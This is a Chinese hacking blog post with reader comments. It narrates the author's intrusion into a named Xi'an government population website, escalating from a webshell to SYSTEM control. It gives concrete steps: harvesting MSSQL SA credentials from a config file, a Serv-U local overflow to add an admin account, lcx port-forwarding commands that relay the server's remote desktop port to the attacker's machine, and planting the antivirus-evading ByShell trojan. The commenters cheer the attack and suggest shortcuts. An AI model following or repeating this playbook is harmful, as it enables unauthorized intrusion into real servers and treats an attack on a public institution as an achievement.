进一步入侵西安人口网获得SYSTEM权限 上接[HTML攻破西安人口网]
刚刚我们拿到了他的WEBSHELL，那么我就这样放下了？当然不可能了，不断进取，不断提升权限才是黑客最喜欢的（不过，声明一下本人不是黑客！）。那什么权限才是最终的呢？这个我不好说，一般来说拿到SYSTEM权限就算是真正的成功入侵了服务器，前面那个WEBSHELL仅仅是WEB权限。听说域管理员是最高的，不过本人不才，没搞过。
好废话不多说了，我们继续。。。。
       通过WEBSHELL我们可以浏览他整个电脑上的盘符（当然要求WEBSHELL权限要相当高了），一般我们的IIS权限仅仅是GUEST权限，只能浏览当前站点下面的文件。不过这个网站显然不是那么安全，我们可以通过WEBSHELL浏览到所有盘，刚刚大概浏览了一下其他盘，没找到什么有价值的东西，不过发现他装有MSsql。
       试着用WEBSHELL执行CMD提示找不到文件，一般来说就是被删掉了，或者是被改名字了。我们自己传一个CMD上去执行，可惜呀，其他盘没写权限，当前目录可写但是无执行权。使用WSCRIPT也无法执行CMD。
       刚刚不是发现装有MSsql嘛，那他网站应该会用吧，不用的话装这东西干嘛？
o(∩_∩)o…哈哈
我们来翻一翻网站里面的文件，一般链接数据库的文件都在INC目录，CONFIG目录，INCLUDE目录中，结果在INCLUDE目录中找到数据库连接文件。如图：


为了安全，我把敏感信息涂掉了。
知道MSsql管理帐号和密码了，而且权限是SA那就等于有SYSTEM权限了，哈哈，当然前提很多。有了这个拿来干吗？直接连他，执行存储过程，加管理员帐号和密码，登陆服务器。呵呵。刚准备去连，结果发现这个服务器是在内网中，我没法连上他，汗~~~~
       用WEBSHELL扫扫他的端口吧


看到1433了，确实装了MSsql了吧！还有个43958是SERV_U，嘿嘿。。。看到这个端口开着，我们就又有机会了，试试SERV_U的那个本地溢出漏洞是否存在。


我们加个管理员 neeke 密码 neeke，然后提交，再次查看系统帐户：


刚才我们加的帐号已经有了，并且是系统用户组。可还是没用啊，又连不上他，别急，能执行命令行，还怕没权限？呵呵
我们传个LCX上去




我们可以看到已经传到网站目录下了。
然后继续SERV_U提权，执行命令 netstat –an >e:\www\xajswsite\netstat.txt
看看当前端口状态

没有看到3389，结合前面端口扫描结果可以肯定没开，还有种可能是改了端口号了，这里面我们觉得可疑的端口就是5529和65500
我们试试看能不能连上，在自己的机子上执行lcx –listen 51 3800




通过SERV_U溢出，我们执行：lcx –slave 自己的IP 51 127.0.0.1 3389（这里我还是不确定，所以就先试试3389）


看看有数据传输了，端口已经映射成功了。




可是链接失败，OK！换端口。


方法同上，只是端口改成5529

看到这个消息，可以肯定是改成5529了，只是还是无法连，我也不知道是什么原因。
看来反向，正向都没办法了，只能玩远程控制木马了。灰鸽子？不行！不免杀，不过主动防御。用哪个呢？想了会，决定用BYSHELL了，自称过好几款杀软的主动防御。我们来配置一个马。

生成后传到网站上。然后还是靠SERV_U执行他


几秒钟后：服务器上线了，被我们控制了。

为了确定就是服务器，我们PING他：

这下可以肯定了！

OK，服务器入侵完毕，SYSTEM权限已经拿到。
本文来自：Neeke's blog
原文地址：http://www.ineeke.cn/archives/2008/03/249.html

向来都听说政府网站安全不怎么样，今天LZ以实力再次证明了这个真理

权限好大``

提权思路平淡无奇。没有新意。就是简单serv-u提权，有必要写出来吗？

知道MSsql管理帐号和密码了，而且权限是SA那就等于有SYSTEM权限了，哈哈，当然前提很多。有了这个拿来干吗？直接连他，执行存储过程，加管理员帐号和密码，登陆服务器。呵呵。刚准备去连，结果发现这个服务器是在内网中，我没法连上他，汗~~~~


还有，即然知道SA口令，不能从外部连接，WEBSHELL一样可以连接它的1433进行提权。感觉楼主走了弯路。